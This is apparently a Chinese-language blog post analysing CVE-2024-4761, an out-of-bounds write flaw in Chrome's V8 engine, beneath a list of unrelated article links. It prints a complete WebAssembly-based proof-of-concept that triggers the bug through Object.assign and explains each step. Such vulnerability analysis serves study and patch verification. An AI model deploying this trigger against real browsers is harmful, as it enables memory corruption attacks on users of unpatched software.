- 1【ARM Cache 系列文章 11.1 -- ARM Cache 全相连 详细介绍】
- 2【强化学习】Q-Learning_基于贪心策略的q-learning算法实验分析与总结
- 3拼尽全力!4年Java经验小伙收获美团Offer,分享他的社招Java岗4面面经_美团java面试经验
- 4Springboot+vue+小程序+基于微信小程序的在线学习平台
- 5【2018】ios app真机调试到上架App Store完整教程
- 6GPT-3组合DALL·E,60秒内搞定游戏设定和原型动画!网友看后:这游戏想玩
- 7本地搭建Stable Diffusion并利用免费组网工具实现远程访问AI绘图服务_绘世监听模式
- 8Docker安装elasticsearch5(爬坑心得)_docker 安装5版本的es
- 9Spring事务@Transactional注解原理及其失效的几种场景_@transactional 性能 影响
- 10征集即将截止,《中国AIGC产业全景报告暨AIGC 50》邀你共同参与!
CVE-2024-4761 Chrome 的 JavaScript 引擎 V8 中的“越界写入”缺陷
赞
踩
分析 CVE-2024-4761 和 POC 代码
CVE-2024-4761 描述
CVE-2024-4761 是一个在 V8 引擎中发现的越界写漏洞,报告日期为 2024-05-09。这个漏洞可能允许攻击者通过特制的代码执行任意代码或者造成内存破坏,进而导致程序崩溃或其他不安全行为。
POC 代码解析
const prefix = "..."; d8.file.execute(`${prefix}/test/mjsunit/wasm/wasm-module-builder.js`); let builder = new WasmModuleBuilder(); let array = builder.addArray(kWasmI32, true); builder.addFunction('createArray', makeSig([kWasmI32], [kWasmExternRef])) .addBody([ kExprLocalGet, 0, kGCPrefix, kExprArrayNewDefault, array, kGCPrefix, kExprExternConvertAny, ]) .exportFunc(); let instance = builder.instantiate({}); let wasm = instance.exports; let array42 = wasm.createArray(42); let src = {}; src.a = 1; delete src.a; for (let i = 0; i < 1024; i++) { src[`p${i}`] = 1; } Object.assign(array42, src);
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
代码分析
-
加载
wasm-module-builder.js模块:d8.file.execute(`${prefix}/test/mjsunit/wasm/wasm-module-builder.js`);- 1
这里假设 D8(V8 引擎的调试工具)正在执行一段 JavaScript 代码,该代码加载了 WebAssembly 模块构建器脚本。
-
构建 WebAssembly 模块:
let builder = new WasmModuleBuilder(); let array = builder.addArray(kWasmI32, true);- 1
- 2
使用
WasmModuleBuilder创建一个新的 WebAssembly 模块,并定义一个整数数组类型。 -
添加和导出一个函数:
builder.addFunction('createArray', makeSig([kWasmI32], [kWasmExternRef])) .addBody([ kExprLocalGet, 0, kGCPrefix, kExprArrayNewDefault, array, kGCPrefix, kExprExternConvertAny, ]) .exportFunc();- 1
- 2
- 3
- 4
- 5
- 6
- 7
这个函数
createArray接受一个整数参数,创建一个新的 WebAssembly 数组并返回一个外部引用。函数体包含指令序列来获取局部变量,创建默认的数组,并将其转换为外部引用。 -
实例化模块并调用导出函数:
let instance = builder.instantiate({}); let wasm = instance.exports; let array42 = wasm.createArray(42);- 1
- 2
- 3
实例化模块后,调用
createArray函数,创建一个包含 42 个元素的数组。 -
构建和修改对象:
let src = {}; src.a = 1; delete src.a; for (let i = 0; i < 1024; i++) { src[`p${i}`] = 1; } Object.assign(array42, src);- 1
- 2
- 3
- 4
- 5
- 6
- 7
创建一个对象
src,并在其中动态添加属性。最后,使用Object.assign将src的属性赋值给array42。
漏洞利用可能性
此代码通过 Object.assign 将一个具有大量属性的对象赋值给一个 WebAssembly 数组,这种操作在 V8 引擎内部可能导致内存管理或边界检查失效,进而触发越界写漏洞。具体表现可能包括覆盖数组边界以外的内存区域,从而执行任意代码或导致程序崩溃。
结论
从代码来看,这段 POC 似乎旨在触发 V8 引擎中的越界写漏洞。通过构建一个包含大量属性的对象并将其分配给 WebAssembly 数组,可以测试 V8 的内存边界检查是否有缺陷。如果存在缺陷,该操作可能会导致越界写,从而验证 CVE-2024-4761 漏洞的真实性。因此,POC 代码看起来是合理且可能真实的漏洞利用示例。
